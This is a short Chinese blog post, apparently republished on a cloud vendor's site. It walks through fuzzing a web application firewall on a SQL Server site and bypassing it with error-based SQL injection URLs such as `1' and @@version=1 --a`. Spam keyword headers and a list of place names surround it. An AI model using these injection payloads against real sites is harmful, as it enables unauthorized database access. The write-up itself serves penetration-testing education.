91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

一個非常簡單的WAF繞過。。

發布時間:2020-06-20 21:43:05 來源:網絡 閱讀:886 作者:z2pp 欄目:安全技術

0x00 前言


確實是非常簡單,如果是新手的話,我希望能給你帶來一些思路,老鳥的話就emm...

0x01 起因


工具掃到了一個有sqlserver特性的站點
一個非常簡單的WAF繞過。。
通常出現這種錯誤信息,說明該站點配置不當,錯誤信息會直接顯示,也沒用強制類型轉換的信息,那么一般就有報錯型注入了!來檢測一下
一個非常簡單的WAF繞過。。
卻出現了WAF的信息

0x02 fuzz


遇到WAF首先得先看看是什么關鍵字觸發了攔截請求,所以我們先進行簡單的調試

http://xxxx/xxxx.aspx?xxxx=1' and --a

一個非常簡單的WAF繞過。。
語法出錯是很正常的,因為我們添加了and且后面沒任何值,所以我們可以假設語句變成了

select xxx from xxx where xxxx=1' and --a

但我們發現其實并沒有觸發WAF,說明and關鍵字并沒有在過濾的列表當中,繼續嘗試

http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a

一個非常簡單的WAF繞過。。
竟然觸發了WAF,經過多次調試,發現是and后面居然不能帶數字。。這樣就不會報錯了

http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a

一個非常簡單的WAF繞過。。
那么再次嘗試下原來的代碼,將順序調整,成功!

http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a

一個非常簡單的WAF繞過。。

一個非常簡單的WAF繞過。。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

美姑县| 岳阳县| 遵义市| 霍城县| 嘉荫县| 桃园市| 周宁县| 巍山| 慈溪市| 峨边| 新干县| 汉寿县| 四子王旗| 万盛区| 天镇县| 灵璧县| 五指山市| 密云县| 汝南县| 顺昌县| 肥城市| 襄樊市| 开封市| 桐乡市| 台中县| 洪雅县| 信丰县| 泊头市| 雷山县| 平邑县| 和田县| 资中县| 肇源县| 澄城县| 铜鼓县| 嘉义市| 阳东县| 宁河县| 阜阳市| 巴南区| 香格里拉县|